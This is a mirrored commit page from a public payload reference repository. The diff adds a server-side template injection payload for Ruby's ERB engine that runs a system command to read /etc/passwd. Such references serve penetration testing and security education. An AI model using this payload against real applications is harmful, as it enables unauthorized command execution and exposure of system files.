mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 21:35:27 +00:00
Merge pull request #196 from idealphase/master
Adding Execute code using SSTI for ERB engine in SSTI vulnerability payload
This commit is contained in:
commit
008cbcf9fc
@ -91,6 +91,11 @@ Slim:
|
|||||||
|
|
||||||
### Code execution
|
### Code execution
|
||||||
|
|
||||||
|
Execute code using SSTI for ERB engine.
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= system('cat /etc/passwd') %>
|
||||||
|
```
|
||||||
Execute code using SSTI for Slim engine.
|
Execute code using SSTI for Slim engine.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
Loading…
Reference in New Issue
Block a user